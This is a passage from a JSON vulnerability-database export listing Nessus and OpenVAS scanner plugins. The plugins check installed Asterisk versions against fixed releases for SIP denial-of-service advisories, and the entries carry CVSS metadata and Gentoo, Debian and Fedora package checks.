eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.12.3\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"10.12.3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.5.1\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.5.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.x < 1.8.23.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"1.8.23.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.15-cert3\n if (version =~ \"^1\\.8\\.15([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 11.2.x < 11.2-cert2\n if (version =~ \"^11\\.2([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"11.2-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-19T14:50:35", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. The application does not properly handle an invalid SDP in a SIP request if such a request defines media descriptions and then defines connection data.", "cvss3": {}, "published": "2013-09-10T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "8007.PRM", "href": "https://www.tenable.com/plugins/nnm/8007", "sourceData": "Binary data 8007.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-19T14:50:35", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. The application does not properly handle 'ACK' messages with SDP after a channel has been closed.", "cvss3": {}, "published": "2013-09-10T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "8006.PRM", "href": "https://www.tenable.com/plugins/nnm/8006", "sourceData": "Binary data 8006.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:49", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. \n\nThe application does not properly handle 'ACK' messages with SDP after a channel has been closed.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_004.NASL", "href": "https://www.tenable.com/plugins/nessus/69558", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69558);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-5641\");\n script_bugtraq_id(62021);\n\n script_name(english:\"Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\ndenial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a denial of\nservice vulnerability. \n\nThe application does not properly handle 'ACK' messages with SDP after a\nchannel has been closed.\");\n # https://www.asterisk.org/downloads/asterisk-news/asterisk-1815-cert3-18231-10123-10123-digiumphones-112-cert2-and-1151-now\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?116d061b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-21064\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.23.1 / 11.5.1 / Certified Asterisk 1.8.15-cert3\n/ 11.2-cert2, or apply the appropriate patch listed in the Asterisk\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 11x < 11.5.1\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.5.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.17.0 to < 1.8.23.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n lower_cutoff = \"1.8.17.0\";\n fixed = \"1.8.23.1\";\n if (\n (ver_compare(ver:version, fix:lower_cutoff, app:\"asterisk\") >= 0)\n &&\n (ver_compare(ver:version, fix:fixed, app:\"asterisk\") < 0)\n )\n vulnerable = -1;\n }\n\n # Asterisk Certified 1.8.15-cert3\n if (version =~ \"^1\\.8\\.15([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 11.2-cert2\n if (version =~ \"^11\\.2([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"11.2-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-18T14:26:54", "description": "The remote host is affected by the vulnerability described in GLSA-201401-15 (Asterisk: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or obtain sensitive information.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2014-01-21T00:00:00", "type": "nessus", "title": "GLSA-201401-15 : Asterisk: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686", "CVE-2013-5641", "CVE-2013-5642", "CVE-2013-7100"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:asterisk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201401-15.NASL", "href": "https://www.tenable.com/plugins/nessus/72054", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201401-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72054);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\", \"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\", \"CVE-2013-5641\", \"CVE-2013-5642\", \"CVE-2013-7100\");\n script_xref(name:\"GLSA\", value:\"201401-15\");\n\n script_name(english:\"GLSA-201401-15 : Asterisk: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201401-15\n(Asterisk: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Asterisk. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could execute arbitrary code with the privileges of\n the process, cause a Denial of Service condition, or obtain sensitive\n information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201401-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Asterisk 11.* users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/asterisk-11.7.0'\n All Asterisk 1.8.* users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/asterisk-1.8.25.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/asterisk\", unaffected:make_list(\"ge 11.7.0\", \"rge 1.8.25.0\"), vulnerable:make_list(\"lt 11.7.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Asterisk\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:51:52", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:892749", "href": "http://plugins.openvas.org/nasl.php?oid=892749", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2749.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2749-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Debian Linux\";\ntag_insight = \"Asterisk is an Open Source PBX and telephony toolkit. It is, in a\nsense, middleware between Internet and telephony channels on the bottom,\nand Internet and telephony applications at the top.\";\ntag_solution = \"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\";\ntag_summary = \"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892749);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2013-5642\", \"CVE-2013-5641\");\n script_name(\"Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-09-02 00:00:00 +0200 (Mon, 02 Sep 2013)\");\n script_tag(name: \"cvss_base\", value:\"5.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2749.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:51:47", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15560", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:866890", "href": "http://plugins.openvas.org/nasl.php?oid=866890", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866890);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:16 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15560\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-15560\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\");\n script_summary(\"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-24T11:10:14", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15567", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2018-01-24T00:00:00", "id": 